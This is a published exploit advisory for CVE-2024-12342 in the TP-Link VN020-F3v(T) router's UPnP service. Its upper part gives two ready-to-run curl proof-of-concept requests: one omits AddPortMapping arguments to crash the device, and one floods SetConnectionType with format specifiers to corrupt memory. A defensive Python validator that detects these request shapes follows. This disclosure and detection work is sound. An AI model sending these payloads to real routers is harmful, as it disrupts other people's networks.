## https://sploitus.com/exploit?id=PACKETSTORM:190533
# Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)
    # Date: 10/22/2024
    # Exploit Author: Mohamed Maatallah
    # Vendor Homepage: https://www.tp-link.com
    # Version: TT_V6.2.1021 (VN020-F3v(T))
    # Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
    # CVE: CVE-2024-12342
    
    
    Description:
    Two critical vulnerabilities were discovered in the UPnP implementation
    of the TP-Link VN020-F3v(T) router, affecting the WANIPConnection
    service. They allow unauthenticated attackers to cause denial of service
    and potential memory corruption through malformed SOAP requests.
    
    Proof of Concept 1 (Missing Parameters DoS):
    
    curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
    -H "Content-Type: text/xml" \
    -H "SOAPAction: \"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\"" \
    -d '<?xml version="1.0"?>
    <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
    <s:Body><u:AddPortMapping>
    <NewPortMappingDescription>hello</NewPortMappingDescription>
    </u:AddPortMapping></s:Body></s:Envelope>'
    
    Proof of Concept 2 (Memory Corruption):
    
    curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
         -H "Content-Type: text/xml" \
         -H "SOAPAction: \"urn:schemas-upnp-org:service:WANIPConnection:1#SetConnectionType\"" \
         -d '<?xml version="1.0"?>
    <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
      <s:Body>
        <u:SetConnectionType
    xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
          <NewConnectionType>'"$(perl -e 'print "%x" x
    10000;')"'</NewConnectionType>
        </u:SetConnectionType>
      </s:Body>
    </s:Envelope>'
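
A defender-side check for the two request shapes above, as an added example that is not part of the original advisory or the vendor's code: a Python validator, of the kind one might run in a filtering proxy or over captured traffic, that flags control requests with missing AddPortMapping arguments, over-long values, or printf-style specifiers. The size limits, function names and sample body are assumptions constructed for illustration; the AddPortMapping argument list is the one in the UPnP WANIPConnection:1 service definition.

```python
import re
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
# Input arguments of AddPortMapping per the UPnP WANIPConnection:1 definition.
ADD_PORT_MAPPING_ARGS = {
    "NewRemoteHost", "NewExternalPort", "NewProtocol", "NewInternalPort", "NewInternalClient",
    "NewEnabled", "NewPortMappingDescription", "NewLeaseDuration"}
MAX_BODY_LEN, MAX_ARG_LEN = 4096, 256   # assumed policy limits, not from the advisory
FORMAT_SPEC = re.compile(r"%[0-9.$*#+-]*[hlLjzt]*[diouxXeEfgGcspn]")

# Constructed sample: SetConnectionType carrying a short run of specifiers.
SAMPLE_ACTION = '"urn:schemas-upnp-org:service:WANIPConnection:1#SetConnectionType"'
SAMPLE_BODY = (
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
    '<u:SetConnectionType xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">'
    "<NewConnectionType>%x%x%x%x</NewConnectionType>"
    "</u:SetConnectionType></s:Body></s:Envelope>"
)

def local(tag):
    return tag.rsplit("}", 1)[-1]   # '{namespace}Name' -> 'Name'

def inspect_request(soap_action, body):
    """Return findings for one SOAP control request; an empty list means clean."""
    if len(body) > MAX_BODY_LEN:    # cap size before handing input to the parser
        return [f"body exceeds {MAX_BODY_LEN} characters"]
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:    # includes undeclared prefixes such as u:
        return [f"unparseable XML: {exc}"]
    body_el = root.find(f"{{{SOAP_NS}}}Body")
    if body_el is None or len(body_el) != 1:
        return ["SOAP Body must contain exactly one action element"]
    action = soap_action.strip().strip('"').rsplit("#", 1)[-1]
    call, findings = body_el[0], []
    if local(call.tag) != action:
        findings.append(f"body element {local(call.tag)!r} != SOAPAction {action!r}")
    args = {local(child.tag): child.text or "" for child in call}
    if action == "AddPortMapping":
        missing = sorted(ADD_PORT_MAPPING_ARGS - args.keys())
        if missing:
            findings.append("missing arguments: " + ", ".join(missing))
    for name, value in args.items():
        if len(value) > MAX_ARG_LEN:
            findings.append(f"{name}: {len(value)} chars exceeds {MAX_ARG_LEN}")
        if FORMAT_SPEC.search(value):
            findings.append(f"{name}: contains printf-style format specifier")
    return findings
```

Calling `inspect_request(SAMPLE_ACTION, SAMPLE_BODY)` returns a single finding for the format specifiers; a request is forwarded only when the list is empty.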